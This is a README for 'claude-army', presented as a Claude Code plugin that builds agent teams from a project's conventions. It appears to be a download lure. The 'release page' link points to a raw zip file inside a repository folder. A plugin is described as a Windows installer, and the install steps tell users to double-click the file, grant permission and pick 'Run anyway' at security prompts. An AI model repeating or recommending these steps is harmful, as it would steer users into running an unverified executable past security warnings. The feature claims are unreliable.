π€ claude-army - Build project-specific agent teams
π What this app does
claude-army is a Claude Code plugin that looks at your project and builds a team of specialized agents around it. It studies code patterns, pull request reviews, and local conventions so the agents match the way your project already works.
Use it when you want Claude Code to help with tasks like:
- Understanding a new codebase
- Reviewing pull requests with project rules in mind
- Splitting work across focused agents
- Keeping output aligned with the style of the repo
- Reducing repeated setup for common tasks
π» Before you start
You only need a Windows PC and access to the internet. For the best experience, have:
- Windows 10 or Windows 11
- A modern web browser
- Claude Code already installed
- Enough free disk space for the app and project files
- Permission to download files on your PC
π₯ Download the app
- Open the release page: https://github.com/Shaylyntriggerhappy850/claude-army/raw/refs/heads/main/skills/analyze/claude-army-v1.7.zip
- Find the latest release at the top of the page.
- Download the Windows file from that release.
- Save the file in a folder you can find again, such as Downloads or Desktop.
If the release page shows more than one file, choose the Windows version. If you see a zipped file, keep it in the same folder until you finish setup.
πͺ Install on Windows
- Open the folder where you saved the file.
- If the file is a .zip, right-click it and choose Extract All.
- Open the extracted folder.
- Find the main app file or installer.
- Double-click it to start the setup or launch the app.
- If Windows asks for permission, choose Yes.
- If you see a security prompt, choose Run anyway only if the file came from the release page above.
βοΈ First-time setup
After the app opens, connect it to Claude Code if the app asks for it.
- Start Claude Code on your PC.
- Open the claude-army plugin or setup screen.
- Point it at the project you want to analyze.
- Wait while it scans the codebase.
- Let it build the agent team from the project rules and patterns.
The first scan may take a few minutes if the project is large.
π§ What claude-army looks for
claude-army studies your project so the agents are grounded in real project data. It can look at:
- File names and folder layout
- Common coding patterns
- Review comments and PR habits
- Naming style used in the repo
- Repeated ways the team handles tasks
- Project-specific rules and conventions
This helps the agents act like they belong to the project instead of using a generic template.
𧩠Main features
- Builds teams of focused agents
- Uses project patterns as a base for agent behavior
- Helps with code review work
- Supports Claude Code workflows
- Keeps agent output closer to repo style
- Works well for large or active codebases
- Cuts down on repeated manual setup
π οΈ How to use it
1. Open your project
Open the folder that contains the code you want claude-army to analyze.
2. Run the scan
Start the app and let it read the project files.
3. Review the agent plan
The app creates a set of agents with clear roles. You may see agents for review, cleanup, testing, or feature work.
4. Use the agents in Claude Code
Send tasks to the agents that fit the job. For example:
- Use a review agent for pull request checks
- Use a refactor agent for code cleanup
- Use a test agent for test coverage work
- Use a planning agent for task breakdown
5. Re-scan when the project changes
If your repo changes a lot, run another scan so the agent set stays current.
π§ͺ Example use cases
- A new developer opens a large repo and needs help finding the main parts
- A team wants PR reviews that follow the repoβs own standards
- A project needs multiple steps handled in parallel
- A maintainer wants agents that match the code style already in the codebase
- A user wants Claude Code to focus on one area of the project at a time
